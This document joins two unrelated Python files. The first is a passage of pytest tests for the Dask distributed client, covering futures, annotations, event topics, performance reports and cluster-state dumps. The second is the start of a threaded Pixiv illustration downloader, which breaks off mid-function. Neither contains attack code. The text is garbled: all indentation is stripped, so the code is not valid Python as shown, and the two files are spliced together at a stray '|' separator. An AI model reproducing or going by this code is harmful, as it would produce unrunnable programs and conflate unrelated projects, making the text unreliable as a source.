with dask.config.set(foo=100):
async with LocalCluster(
n_workers=1,
asynchronous=True,
processes=True,
dashboard_address=":0",
) as lc:
async with Client(lc, asynchronous=True) as c:
assert await c.submit(dask.config.get, "foo") == 100
@gen_cluster(client=True)
async def test_futures_of_sorted(c, s, a, b):
pytest.importorskip("dask.dataframe")
df = await dask.datasets.timeseries(dtypes={"x": int}).persist()
futures = futures_of(df)
for k, f in zip(df.__dask_keys__(), futures):
assert str(k) in str(f)
@pytest.mark.flaky(reruns=10, reruns_delay=5)
@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": "10ms"})
async def test_profile_server(c, s, a, b):
for i in range(5):
try:
x = c.map(slowinc, range(10), delay=0.01, workers=a.address, pure=False)
await wait(x)
await asyncio.gather(
c.run(slowinc, 1, delay=0.5), c.run_on_scheduler(slowdec, 1, delay=0.5)
)
p = await c.profile(server=True) # All worker servers
assert "slowinc" in str(p)
p = await c.profile(scheduler=True) # Scheduler
assert "slowdec" in str(p)
except AssertionError:
if i == 4:
raise
else:
pass
else:
break
@gen_cluster(client=True)
async def test_await_future(c, s, a, b):
future = c.submit(inc, 1)
async def f(): # flake8: noqa
result = await future
assert result == 2
await f()
future = c.submit(div, 1, 0)
async def f():
with pytest.raises(ZeroDivisionError):
await future
await f()
@gen_cluster(client=True)
async def test_as_completed_async_for(c, s, a, b):
futures = c.map(inc, range(10))
ac = as_completed(futures)
results = []
async def f():
async for future in ac:
result = await future
results.append(result)
await f()
assert set(results) == set(range(1, 11))
@gen_cluster(client=True)
async def test_as_completed_async_for_results(c, s, a, b):
futures = c.map(inc, range(10))
ac = as_completed(futures, with_results=True)
results = []
async def f():
async for future, result in ac:
results.append(result)
await f()
assert set(results) == set(range(1, 11))
assert not s.counters["op"].components[0]["gather"]
@gen_cluster(client=True)
async def test_as_completed_async_for_cancel(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(sleep, 0.3)
ac = as_completed([x, y])
async def _():
await asyncio.sleep(0.1)
await y.cancel(asynchronous=True)
c.loop.add_callback(_)
L = []
async def f():
async for future in ac:
L.append(future)
await f()
assert L == [x, y]
@gen_test()
async def test_async_with():
async with Client(processes=False, dashboard_address=":0", asynchronous=True) as c:
assert await c.submit(lambda x: x + 1, 10) == 11
assert c.status == "closed"
assert c.cluster.status == Status.closed
def test_client_sync_with_async_def(loop):
async def ff():
await asyncio.sleep(0.01)
return 1
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
assert sync(loop, ff) == 1
assert c.sync(ff) == 1
@pytest.mark.skip(reason="known intermittent failure")
@gen_cluster(client=True)
async def test_dont_hold_on_to_large_messages(c, s, a, b):
np = pytest.importorskip("numpy")
da = pytest.importorskip("dask.array")
x = np.random.random(1000000)
xr = weakref.ref(x)
d = da.from_array(x, chunks=(100000,))
d = d.persist()
del x
start = time()
while xr() is not None:
if time() > start + 5:
# Help diagnosing
from types import FrameType
x = xr()
if x is not None:
del x
rc = sys.getrefcount(xr())
refs = gc.get_referrers(xr())
print("refs to x:", rc, refs, gc.isenabled())
frames = [r for r in refs if isinstance(r, FrameType)]
for i, f in enumerate(frames):
print(
"frames #%d:" % i,
f.f_code.co_name,
f.f_code.co_filename,
sorted(f.f_locals),
)
pytest.fail("array should have been destroyed")
await asyncio.sleep(0.200)
@gen_cluster(client=True)
async def test_run_scheduler_async_def(c, s, a, b):
async def f(dask_scheduler):
await asyncio.sleep(0.01)
dask_scheduler.foo = "bar"
await c.run_on_scheduler(f)
assert s.foo == "bar"
async def f(dask_worker):
await asyncio.sleep(0.01)
dask_worker.foo = "bar"
await c.run(f)
assert a.foo == "bar"
assert b.foo == "bar"
@gen_cluster(client=True)
async def test_run_scheduler_async_def_wait(c, s, a, b):
async def f(dask_scheduler):
await asyncio.sleep(0.01)
dask_scheduler.foo = "bar"
await c.run_on_scheduler(f, wait=False)
while not hasattr(s, "foo"):
await asyncio.sleep(0.01)
assert s.foo == "bar"
async def f(dask_worker):
await asyncio.sleep(0.01)
dask_worker.foo = "bar"
await c.run(f, wait=False)
while not hasattr(a, "foo") or not hasattr(b, "foo"):
await asyncio.sleep(0.01)
assert a.foo == "bar"
assert b.foo == "bar"
@pytest.mark.skipif(WINDOWS, reason="frequently kills off the whole test suite")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 2)] * 2)
async def test_performance_report(c, s, a, b):
pytest.importorskip("bokeh")
da = pytest.importorskip("dask.array")
async def f(stacklevel, mode=None):
"""
We wrap this in a function so that the assertions aren't in the
performanace report itself
Also, we want this comment to appear
"""
x = da.random.random((1000, 1000), chunks=(100, 100))
with tmpfile(extension="html") as fn:
async with performance_report(
filename=fn, stacklevel=stacklevel, mode=mode
):
await c.compute((x + x.T).sum())
with open(fn) as f:
data = f.read()
return data
# Ensure default kwarg maintains backward compatability
data = await f(stacklevel=1)
assert "Also, we want this comment to appear" in data
assert "bokeh" in data
assert "random" in data
assert "Dask Performance Report" in data
assert "x = da.random" in data
assert "Threads: 4" in data
assert "distributed.scheduler - INFO - Clear task state" in data
assert dask.__version__ in data
# stacklevel=2 captures code two frames back -- which in this case
# is the testing function
data = await f(stacklevel=2)
assert "async def test_performance_report(c, s, a, b):" in data
assert "Dask Performance Report" in data
# stacklevel=0 or lower is overridden to stacklevel=1 so we don't see
# distributed internals
data = await f(stacklevel=0)
assert "Also, we want this comment to appear" in data
assert "Dask Performance Report" in data
data = await f(stacklevel=1, mode="inline")
assert "cdn.bokeh.org" not in data
data = await f(stacklevel=1, mode="cdn")
assert "cdn.bokeh.org" in data
@gen_cluster(nthreads=[])
async def test_client_gather_semaphore_loop(s):
async with Client(s.address, asynchronous=True) as c:
assert c._gather_semaphore._loop is c.loop.asyncio_loop
@gen_cluster(client=True)
async def test_as_completed_condition_loop(c, s, a, b):
seq = c.map(inc, range(5))
ac = as_completed(seq)
assert ac.condition._loop == c.loop.asyncio_loop
def test_client_connectionpool_semaphore_loop(s, a, b):
with Client(s["address"]) as c:
assert c.rpc.semaphore._loop is c.loop.asyncio_loop
@pytest.mark.slow
@gen_cluster(nthreads=[], timeout=60)
async def test_mixed_compression(s):
pytest.importorskip("lz4")
da = pytest.importorskip("dask.array")
async with Nanny(
s.address, nthreads=1, config={"distributed.comm.compression": None}
):
async with Nanny(
s.address, nthreads=1, config={"distributed.comm.compression": "lz4"}
):
async with Client(s.address, asynchronous=True) as c:
await c.get_versions()
x = da.ones((10000, 10000))
y = x + x.T
await c.compute(y.sum())
@gen_cluster(client=True)
async def test_futures_in_subgraphs(c, s, a, b):
"""Regression test of <https://github.com/dask/distributed/issues/4145>"""
dd = pytest.importorskip("dask.dataframe")
import pandas as pd
ddf = dd.from_pandas(
pd.DataFrame(
dict(
uid=range(50),
enter_time=pd.date_range(
start="2020-01-01", end="2020-09-01", periods=50, tz="UTC"
),
)
),
npartitions=5,
)
ddf = ddf[ddf.uid.isin(range(29))].persist()
ddf["local_time"] = ddf.enter_time.dt.tz_convert("US/Central")
ddf["day"] = ddf.enter_time.dt.day_name()
ddf = await c.submit(dd.categorical.categorize, ddf, columns=["day"], index=False)
@gen_cluster(client=True)
async def test_get_task_metadata(c, s, a, b):
# Populate task metadata
await c.register_worker_plugin(TaskStateMetadataPlugin())
async with get_task_metadata() as tasks:
f = c.submit(slowinc, 1)
await f
metadata = tasks.metadata
assert f.key in metadata
assert metadata[f.key] == s.tasks.get(f.key).metadata
state = tasks.state
assert f.key in state
assert state[f.key] == "memory"
assert not any(isinstance(p, CollectTaskMetaDataPlugin) for p in s.plugins)
@gen_cluster(client=True)
async def test_get_task_metadata_multiple(c, s, a, b):
# Populate task metadata
await c.register_worker_plugin(TaskStateMetadataPlugin())
# Ensure that get_task_metadata only collects metadata for
# tasks which are submitted and completed within its context
async with get_task_metadata() as tasks1:
f1 = c.submit(slowinc, 1)
await f1
async with get_task_metadata() as tasks2:
f2 = c.submit(slowinc, 2)
await f2
metadata1 = tasks1.metadata
metadata2 = tasks2.metadata
assert len(metadata1) == 2
assert sorted(metadata1.keys()) == sorted([f1.key, f2.key])
assert metadata1[f1.key] == s.tasks.get(f1.key).metadata
assert metadata1[f2.key] == s.tasks.get(f2.key).metadata
assert len(metadata2) == 1
assert list(metadata2.keys()) == [f2.key]
assert metadata2[f2.key] == s.tasks.get(f2.key).metadata
@gen_cluster(client=True)
async def test_log_event(c, s, a, b):
# Log an event from inside a task
def foo():
get_worker().log_event("topic1", {"foo": "bar"})
assert not await c.get_events("topic1")
await c.submit(foo)
events = await c.get_events("topic1")
assert len(events) == 1
assert events[0][1] == {"foo": "bar"}
# Log an event while on the scheduler
def log_scheduler(dask_scheduler):
dask_scheduler.log_event("topic2", {"woo": "hoo"})
await c.run_on_scheduler(log_scheduler)
events = await c.get_events("topic2")
assert len(events) == 1
assert events[0][1] == {"woo": "hoo"}
# Log an event from the client process
await c.log_event("topic2", ("alice", "bob"))
events = await c.get_events("topic2")
assert len(events) == 2
assert events[1][1] == ("alice", "bob")
@gen_cluster(client=True)
async def test_annotations_task_state(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(qux="bar", priority=100):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all(
{"qux": "bar", "priority": 100} == ts.annotations for ts in s.tasks.values()
)
@pytest.mark.parametrize("fn", ["compute", "persist"])
def test_annotations_compute_time(fn):
da = pytest.importorskip("dask.array")
@gen_cluster(client=True)
async def test(c, s, a, b):
x = da.ones(10, chunks=(5,))
with dask.annotate(foo="bar"):
# Turn off optimization to avoid rewriting layers and picking up annotations
# that way. Instead, we want `compute`/`persist` to be able to pick them up.
x = await getattr(c, fn)(x, optimize_graph=False)
assert all({"foo": "bar"} == ts.annotations for ts in s.tasks.values())
test()
@pytest.mark.xfail(reason="https://github.com/dask/dask/issues/7036")
@gen_cluster(client=True)
async def test_annotations_survive_optimization(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(foo="bar"):
x = da.ones(10, chunks=(5,))
ann = x.__dask_graph__().layers[x.name].annotations
assert ann is not None
assert ann.get("foo", None) == "bar"
(xx,) = dask.optimize(x)
ann = xx.__dask_graph__().layers[x.name].annotations
assert ann is not None
assert ann.get("foo", None) == "bar"
@gen_cluster(client=True)
async def test_annotations_priorities(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(priority=15):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all("15" in str(ts.priority) for ts in s.tasks.values())
assert all(ts.priority[0] == -15 for ts in s.tasks.values())
assert all({"priority": 15} == ts.annotations for ts in s.tasks.values())
@gen_cluster(client=True)
async def test_annotations_workers(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(workers=[a.address]):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all({"workers": (a.address,)} == ts.annotations for ts in s.tasks.values())
assert all({a.address} == ts.worker_restrictions for ts in s.tasks.values())
assert a.data
assert not b.data
@gen_cluster(client=True)
async def test_annotations_retries(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(retries=2):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all(ts.retries == 2 for ts in s.tasks.values())
assert all(ts.annotations == {"retries": 2} for ts in s.tasks.values())
@gen_cluster(client=True)
async def test_annotations_blockwise_unpack(c, s, a, b):
da = pytest.importorskip("dask.array")
np = pytest.importorskip("numpy")
from dask.array.utils import assert_eq
# A flaky doubling function -- need extra args because it is called before
# application to establish dtype/meta.
scale = varying([ZeroDivisionError("one"), ZeroDivisionError("two"), 2, 2])
def flaky_double(x):
return scale() * x
# A reliable double function.
def reliable_double(x):
return 2 * x
x = da.ones(10, chunks=(5,))
# The later annotations should not override the earlier annotations
with dask.annotate(retries=2):
y = x.map_blocks(flaky_double, meta=np.array((), dtype=float))
with dask.annotate(retries=0):
z = y.map_blocks(reliable_double, meta=np.array((), dtype=float))
with dask.config.set(optimization__fuse__active=False):
z = await c.compute(z)
assert_eq(z, np.ones(10) * 4.0)
@gen_cluster(
client=True,
nthreads=[
("127.0.0.1", 1),
("127.0.0.1", 1, {"resources": {"GPU": 1}}),
],
)
async def test_annotations_resources(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(resources={"GPU": 1}):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all([{"GPU": 1} == ts.resource_restrictions for ts in s.tasks.values()])
assert all([{"resources": {"GPU": 1}} == ts.annotations for ts in s.tasks.values()])
@gen_cluster(
client=True,
nthreads=[
("127.0.0.1", 1),
("127.0.0.1", 1, {"resources": {"GPU": 1}}),
],
)
async def test_annotations_resources_culled(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones((2, 2, 2), chunks=1)
with dask.annotate(resources={"GPU": 1}):
y = x.map_blocks(lambda x0: x0, meta=x._meta)
z = y[0, 0, 0]
(z,) = c.compute([z], optimize_graph=False)
await z
# it worked!
@gen_cluster(client=True)
async def test_annotations_loose_restrictions(c, s, a, b):
da = pytest.importorskip("dask.array")
# Eventually fails if allow_other_workers=False
with dask.annotate(workers=["fake"], allow_other_workers=True):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all(not ts.worker_restrictions for ts in s.tasks.values())
assert all({"fake"} == ts.host_restrictions for ts in s.tasks.values())
assert all(
[
{"workers": ("fake",), "allow_other_workers": True} == ts.annotations
for ts in s.tasks.values()
]
)
@gen_cluster(client=True)
async def test_workers_collection_restriction(c, s, a, b):
da = pytest.importorskip("dask.array")
future = c.compute(da.arange(10), workers=a.address)
await future
assert a.data and not b.data
@gen_cluster(client=True, nthreads=[("127.0.0.1", 0)])
async def test_get_client_functions_spawn_clusters(c, s, a):
# see gh4565
scheduler_addr = c.scheduler.address
def f(x):
with LocalCluster(
n_workers=1,
processes=False,
dashboard_address=":0",
worker_dashboard_address=":0",
) as cluster2:
with Client(cluster2) as c1:
c2 = get_client()
c1_scheduler = c1.scheduler.address
c2_scheduler = c2.scheduler.address
assert c1_scheduler != c2_scheduler
assert c2_scheduler == scheduler_addr
await c.gather(c.map(f, range(2)))
await a.close()
c_default = default_client()
assert c is c_default
def test_computation_code_walk_frames():
test_function_code = inspect.getsource(test_computation_code_walk_frames)
code = Client._get_computation_code()
assert test_function_code == code
def nested_call():
return Client._get_computation_code()
assert nested_call() == inspect.getsource(nested_call)
with pytest.raises(TypeError, match="Ignored modules must be a list"):
with dask.config.set(
{"distributed.diagnostics.computations.ignore-modules": "test_client"}
):
code = Client._get_computation_code()
with dask.config.set(
{"distributed.diagnostics.computations.ignore-modules": ["test_client"]}
):
import sys
upper_frame_code = inspect.getsource(sys._getframe(1))
code = Client._get_computation_code()
assert code == upper_frame_code
assert nested_call() == upper_frame_code
def test_computation_object_code_dask_compute(client):
da = pytest.importorskip("dask.array")
x = da.ones((10, 10), chunks=(3, 3))
future = x.sum().compute()
y = future
test_function_code = inspect.getsource(test_computation_object_code_dask_compute)
def fetch_comp_code(dask_scheduler):
computations = list(dask_scheduler.computations)
assert len(computations) == 1
comp = computations[0]
assert len(comp.code) == 1
return comp.code[0]
code = client.run_on_scheduler(fetch_comp_code)
assert code == test_function_code
def test_computation_object_code_not_available(client):
np = pytest.importorskip("numpy")
pd = pytest.importorskip("pandas")
dd = pytest.importorskip("dask.dataframe")
df = pd.DataFrame({"a": range(10)})
ddf = dd.from_pandas(df, npartitions=3)
result = np.where(ddf.a > 4)
def fetch_comp_code(dask_scheduler):
computations = list(dask_scheduler.computations)
assert len(computations) == 1
comp = computations[0]
assert len(comp.code) == 1
return comp.code[0]
code = client.run_on_scheduler(fetch_comp_code)
assert code == "<Code not available>"
@gen_cluster(client=True)
async def test_computation_object_code_dask_persist(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones((10, 10), chunks=(3, 3))
future = x.sum().persist()
await future
test_function_code = inspect.getsource(
test_computation_object_code_dask_persist.__wrapped__
)
computations = list(s.computations)
assert len(computations) == 1
comp = computations[0]
assert len(comp.code) == 1
assert comp.code[0] == test_function_code
@gen_cluster(client=True)
async def test_computation_object_code_client_submit_simple(c, s, a, b):
def func(x):
return x
fut = c.submit(func, 1)
await fut
test_function_code = inspect.getsource(
test_computation_object_code_client_submit_simple.__wrapped__
)
computations = list(s.computations)
assert len(computations) == 1
comp = computations[0]
assert len(comp.code) == 1
assert comp.code[0] == test_function_code
@gen_cluster(client=True)
async def test_computation_object_code_client_submit_list_comp(c, s, a, b):
def func(x):
return x
futs = [c.submit(func, x) for x in range(10)]
await c.gather(futs)
test_function_code = inspect.getsource(
test_computation_object_code_client_submit_list_comp.__wrapped__
)
computations = list(s.computations)
assert len(computations) == 1
comp = computations[0]
# Code is deduplicated
assert len(comp.code) == 1
assert comp.code[0] == test_function_code
@gen_cluster(client=True)
async def test_computation_object_code_client_submit_dict_comp(c, s, a, b):
def func(x):
return x
futs = {x: c.submit(func, x) for x in range(10)}
await c.gather(futs)
test_function_code = inspect.getsource(
test_computation_object_code_client_submit_dict_comp.__wrapped__
)
computations = list(s.computations)
assert len(computations) == 1
comp = computations[0]
# Code is deduplicated
assert len(comp.code) == 1
assert comp.code[0] == test_function_code
@gen_cluster(client=True)
async def test_computation_object_code_client_map(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones((10, 10), chunks=(3, 3))
future = c.compute(x.sum(), retries=2)
y = await future
test_function_code = inspect.getsource(
test_computation_object_code_client_map.__wrapped__
)
computations = list(s.computations)
assert len(computations) == 1
comp = computations[0]
assert len(comp.code) == 1
assert comp.code[0] == test_function_code
@gen_cluster(client=True)
async def test_computation_object_code_client_compute(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones((10, 10), chunks=(3, 3))
future = c.compute(x.sum(), retries=2)
y = await future
test_function_code = inspect.getsource(
test_computation_object_code_client_compute.__wrapped__
)
computations = list(s.computations)
assert len(computations) == 1
comp = computations[0]
assert len(comp.code) == 1
assert comp.code[0] == test_function_code
@gen_cluster(client=True, Worker=Nanny)
async def test_upload_directory(c, s, a, b, tmp_path):
from dask.distributed import UploadDirectory
# Be sure to exclude code coverage reports
files_start = {f for f in os.listdir() if not f.startswith(".coverage")}
with open(tmp_path / "foo.py", "w") as f:
f.write("x = 123")
with open(tmp_path / "bar.py", "w") as f:
f.write("from foo import x")
plugin = UploadDirectory(tmp_path, restart=True, update_path=True)
await c.register_worker_plugin(plugin)
[name] = a.plugins
assert os.path.split(tmp_path)[-1] in name
def f():
import bar
return bar.x
results = await c.run(f)
assert results[a.worker_address] == 123
assert results[b.worker_address] == 123
async with Nanny(s.address, local_directory=tmp_path / "foo", name="foo") as n:
results = await c.run(f)
assert results[n.worker_address] == 123
files_end = {f for f in os.listdir() if not f.startswith(".coverage")}
assert files_start == files_end # no change
@gen_cluster(client=True)
async def test_exception_text(c, s, a, b):
def bad(x):
raise Exception(x)
future = c.submit(bad, 123)
await wait(future)
ts = s.tasks[future.key]
assert isinstance(ts.exception_text, str)
assert "123" in ts.exception_text
assert "Exception(x)" in ts.traceback_text
assert "bad" in ts.traceback_text
@gen_cluster(client=True)
async def test_async_task(c, s, a, b):
async def f(x):
return x + 1
future = c.submit(f, 10)
result = await future
assert result == 11
@gen_cluster(client=True)
async def test_async_task_with_partial(c, s, a, b):
async def f(x, y):
return x + y + 1
future = c.submit(functools.partial(f, 1), 10)
result = await future
assert result == 12
@gen_cluster(client=True, nthreads=[("", 1)])
async def test_events_subscribe_topic(c, s, a):
log = []
def user_event_handler(event):
log.append(event)
c.subscribe_topic("test-topic", user_event_handler)
while not s.event_subscriber["test-topic"]:
await asyncio.sleep(0.01)
a.log_event("test-topic", {"important": "event"})
while len(log) != 1:
await asyncio.sleep(0.01)
time_, msg = log[0]
assert isinstance(time_, float)
assert msg == {"important": "event"}
c.unsubscribe_topic("test-topic")
while s.event_subscriber["test-topic"]:
await asyncio.sleep(0.01)
a.log_event("test-topic", {"forget": "me"})
while len(s.events["test-topic"]) == 1:
await asyncio.sleep(0.01)
assert len(log) == 1
async def async_user_event_handler(event):
log.append(event)
await asyncio.sleep(0)
c.subscribe_topic("test-topic", async_user_event_handler)
while not s.event_subscriber["test-topic"]:
await asyncio.sleep(0.01)
a.log_event("test-topic", {"async": "event"})
while len(log) == 1:
await asyncio.sleep(0.01)
assert len(log) == 2
time_, msg = log[1]
assert isinstance(time_, float)
assert msg == {"async": "event"}
# Even though the middle event was not subscribed to, the scheduler still
# knows about all and we can retrieve them
all_events = await c.get_events(topic="test-topic")
assert len(all_events) == 3
@gen_cluster(client=True, nthreads=[("", 1)])
async def test_events_all_servers_use_same_channel(c, s, a):
"""Ensure that logs from all server types (scheduler, worker, nanny)
and the clients themselves arrive"""
log = []
def user_event_handler(event):
log.append(event)
c.subscribe_topic("test-topic", user_event_handler)
while not s.event_subscriber["test-topic"]:
await asyncio.sleep(0.01)
async with Nanny(s.address) as n:
a.log_event("test-topic", "worker")
n.log_event("test-topic", "nanny")
s.log_event("test-topic", "scheduler")
await c.log_event("test-topic", "client")
while not len(log) == 4 == len(set(log)):
await asyncio.sleep(0.1)
@gen_cluster(client=True, nthreads=[])
async def test_events_unsubscribe_raises_if_unknown(c, s):
with pytest.raises(ValueError, match="No event handler known for topic unknown"):
c.unsubscribe_topic("unknown")
@gen_cluster(client=True)
async def test_log_event_warn(c, s, a, b):
def foo():
get_worker().log_event(["foo", "warn"], "Hello!")
with pytest.warns(Warning, match="Hello!"):
await c.submit(foo)
@gen_cluster(client=True)
async def test_log_event_warn_dask_warns(c, s, a, b):
from dask.distributed import warn
def foo():
warn("Hello!")
with pytest.warns(Warning, match="Hello!"):
await c.submit(foo)
@gen_cluster(client=True, Worker=Nanny)
async def test_print(c, s, a, b, capsys):
from dask.distributed import print
def foo():
print("Hello!", 123, sep=":")
await c.submit(foo)
out, err = capsys.readouterr()
assert "Hello!:123" in out
@gen_cluster(client=True, Worker=Nanny)
async def test_print_non_msgpack_serializable(c, s, a, b, capsys):
from dask.distributed import print
def foo():
print(object())
await c.submit(foo)
out, err = capsys.readouterr()
assert "<object object at" in out
def test_print_simple(capsys):
from dask.distributed import print
print("Hello!", 123, sep=":")
out, err = capsys.readouterr()
assert "Hello!:123" in out
def _verify_cluster_dump(path, _format):
path = str(path)
if _format == "msgpack":
import gzip
import msgpack
path += ".msgpack.gz"
with gzip.open(path) as fd:
state = msgpack.unpack(fd)
else:
import yaml
path += ".yaml"
with open(path) as fd:
state = yaml.load(fd, Loader=yaml.Loader)
assert isinstance(state, dict)
assert "scheduler" in state
assert "workers" in state
assert "versions" in state
@pytest.mark.parametrize("_format", ["msgpack", "json", "yaml"])
def test_dump_cluster_state(c, s, a, b, tmp_path, _format):
if _format == "json":
ctx = pytest.raises(ValueError, match="Unsupported format")
else:
ctx = contextlib.nullcontext()
filename = tmp_path / "foo"
with ctx:
c.dump_cluster_state(
filename=filename,
format=_format,
)
_verify_cluster_dump(filename, _format)
@pytest.mark.parametrize("_format", ["msgpack", "json", "yaml"])
@gen_cluster(client=True)
async def test_dump_cluster_state_async(c, s, a, b, tmp_path, _format):
if _format == "json":
ctx = pytest.raises(ValueError, match="Unsupported format")
else:
ctx = contextlib.nullcontext()
filename = tmp_path / "foo"
with ctx:
await c.dump_cluster_state(
filename=filename,
format=_format,
)
_verify_cluster_dump(filename, _format)
@gen_cluster(client=True)
async def test_dump_cluster_state_exclude(c, s, a, b, tmp_path):
futs = c.map(inc, range(10))
while len(s.tasks) != len(futs):
await asyncio.sleep(0.01)
exclude = [
# these are TaskState attributes
"_runspec",
"runspec",
]
filename = tmp_path / "foo"
await c.dump_cluster_state(
filename=filename,
format="yaml",
)
with open(str(filename) + ".yaml") as fd:
import yaml
state = yaml.load(fd, Loader=yaml.Loader)
assert "workers" in state
assert len(state["workers"]) == len(s.workers)
assert "scheduler" in state
assert "tasks" in state["scheduler"]
tasks = state["scheduler"]["tasks"]
assert len(tasks) == len(futs)
for k, task_dump in tasks.items():
assert not any(blocked in task_dump for blocked in exclude)
assert k in s.tasks
|
pixiv.py | #!/usr/bin/env python3
"""
pixiv
Usage:
pixiv.py
pixiv.py <id>...
pixiv.py -r [-d | --date=<date>]
pixiv.py -u
Arguments:
<id> user_ids
Options:
-r Download by ranking
-d <date> --date <date> Target date
-u Update exist folder
-h --help Show this screen
-v --version Show version
Examples:
pixiv.py 7210261 1980643
pixiv.py -r -d 2016-09-24
"""
import datetime
import math
import os
import queue
import re
import sys
import threading
import time
import traceback
import requests
from docopt import docopt
from tqdm import tqdm
from api import PixivApi
from i18n import i18n as _
from model import PixivIllustModel
_THREADING_NUMBER = 10
_finished_download = 0
_CREATE_FOLDER_LOCK = threading.Lock()
_PROGRESS_LOCK = threading.Lock()
_SPEED_LOCK = threading.Lock()
_Global_Download = 0
_error_count = {}
_ILLUST_PER_PAGE = 30
_MAX_ERROR_COUNT = 5
def get_default_save_path():
current_path = os.path.dirname(os.path.abspath(sys.argv[0]))
filepath = os.path.join(current_path, 'illustrations')
if not os.path.exists(filepath):
with _CREATE_FOLDER_LOCK:
if not os.path.exists(os.path.dirname(filepath)):
os.makedirs(os.path.dirname(filepath))
os.makedirs(filepath)
return filepath
def get_speed(elapsed):
"""Get current download speed"""
with _SPEED_LOCK:
global _Global_Download
down = _Global_Download
_Global_Download = 0
speed = down / elapsed
if speed == 0:
return '%8.2f /s' % 0
units = [' B', 'KB', 'MB', 'GB', 'TB', 'PB']
unit = math.floor(math.log(speed, 1024.0))
speed /= math.pow(1024.0, unit)
return '%6.2f %s/s' % (speed, units[unit])
def print_progress(max_size):
global _finished_download
pbar = tqdm(total=max_size)
last = 0
while _finished_download != max_size:
pbar.update(_finished_download - last)
last = _finished_download
time.sleep(0.5)
pbar.update(_finished_download - last)
pbar.close()
def download_file(url, filepath):
headers = {'Referer': 'http://www.pixiv.net/'}
r = requests.get(url, headers=headers, stream=True, timeout=PixivApi.timeout)
if r.status_code == requests.codes.ok:
total_length = r.headers.get('content-length')
if total_length:
data = []
for chunk in r.iter_content(1024 * 16):
data.append(chunk)
with _SPEED_LOCK:
global _Global_Download
_Global_Download += len(chunk)
with open(filepath, 'wb') as f:
list(map(f.write, data))
else:
raise ConnectionError('\r', _('Connection error: %s') % r.status_code)
def download_threading(download_queue):
global _finished_download
while not download_queue.empty():
illustration = download_queue.get()
filepath = illustration['path']
filename = illustration['file']
url = illustration['url']
count = _error_count.get(url, 0)
if count < _MAX_ERROR_COUNT:
if not os.path.exists(filepath):
with _CREATE_FOLDER_LOCK:
if not os.path.exists(os.path.dirname(filepath)):
os.makedirs(os.path.dirname(filepath))
try:
download_file(url, filepath)
with _PROGRESS_LOCK:
_finished_download += 1
except Exception as e:
if count < _MAX_ERROR_COUNT:
print(_('%s => %s download error, retry') % (e, filename))
download_queue.put(illustration)
_error_count[url] = count + 1
else:
print(url, 'reach max retries, canceled')
with _PROGRESS_LOCK:
_finished_download += 1
download_queue.task_done()
def start_and_wait_download_threading(download_queue, count):
"""start download threading and wait till complete"""
progress_t = threading.Thread(target=print_progress, args=(count,))
progress_t.daemon = True
progress_t.start()
for i in range(_THREADING_NUMBER):
download_t = threading.Thread(target=download_threading, args=(download_queue,))
download_t.daemon = True
download_t.start()
progress_t.join()
download_queue.join()
def get_filepath(url, illustration, save_path='.', add_user_folder=False, add_rank=False):
"""return (filename,filepath)"""
if add_user_folder:
user_id = illustration.user_id
user_name = illustration.user_name
current_path = get_default_save_path()
cur_dirs = list(filter(os.path.isdir, [os.path.join(current_path, i) for i in os.listdir(current_path)]))
cur_user_ids = [os.path.basename(cur_dir).split()[0] for cur_dir in cur_dirs]
if user_id not in cur_user_ids:
dir_name = re.sub(r'[<>:"/\\|\?\*]', ' ', user_id + ' ' + user_name)
else:
dir_name = list(i for i in cur_dirs if os.path.basename(i).split()[0] == user_id)[0]
save_path = os.path.join(save_path, dir_name)
filename = url.split('/')[-1]
if add_rank:
filename = f'{illustration.rank} - {filename}'
filepath = os.path.join(save_path, filename)
return filename, filepath
def check_files(illustrations, save_path='.', add_user_folder=False, add_rank=False):
download_queue = queue.Queue()
index_list = []
count = 0
if illustrations:
last_i = -1
for index, illustration in enumerate(illustrations):
if not illustration.image_urls:
continue
else:
for url in illustration.image_urls:
filename, filepath = get_filepath(url, illustration, save_path, add_user_folder, add_rank)
if os.path.exists(filepath):
continue
else:
if last_i != index:
last_i = index
index_list.append(index)
download_queue.put({'url': url, 'file': filename, 'path': filepath})
count += 1
return download_queue, count, index_list
def count_illustrations(illustrations):
return sum(len(i.image_urls) for i in illustrations)
def is_manga(illustrate):
return True if illustrate.is_manga or illustrate.type == 'manga' else False
def download_illustrations(user, data_list, save_path='.', add_user_folder=False, add_rank=False, skip_manga=False):
"""Download illustratons
Args:
user: PixivApi()
data_list: json
save_path: str, download path of the illustrations
add_user_folder: bool, whether put the illustration into user folder
add_rank: bool, add illustration rank at the beginning of filename
"""
illustrations = PixivIllustModel.from_data(data_list)
if skip_manga:
manga_number = sum([is_manga(i) for i in illustrations])
if manga_number:
print('skip', manga_number, 'manga')
illustrations = list(filter(lambda x: not is_manga(x), illustrations))
download_queue, count = check_files(illustrations, save_path, add_user_folder, add_rank)[0:2]
if count > 0:
print(_('Start download, total illustrations '), count)
global _finished_download, _Global_Download
_finished_download = 0
_Global_Download = 0
start_and_wait_download_threading(download_queue, count)
print()
else:
print(_('There is no new illustration need to download'))
def download_by_user_id(user, user_ids=None):
save_path = get_default_save_path()
if not user_ids:
user_ids = input(_('Input the artist\'s id:(separate with space)')).strip().split(' ')
for user_id in user_ids:
print(_('Artists %s') % user_id)
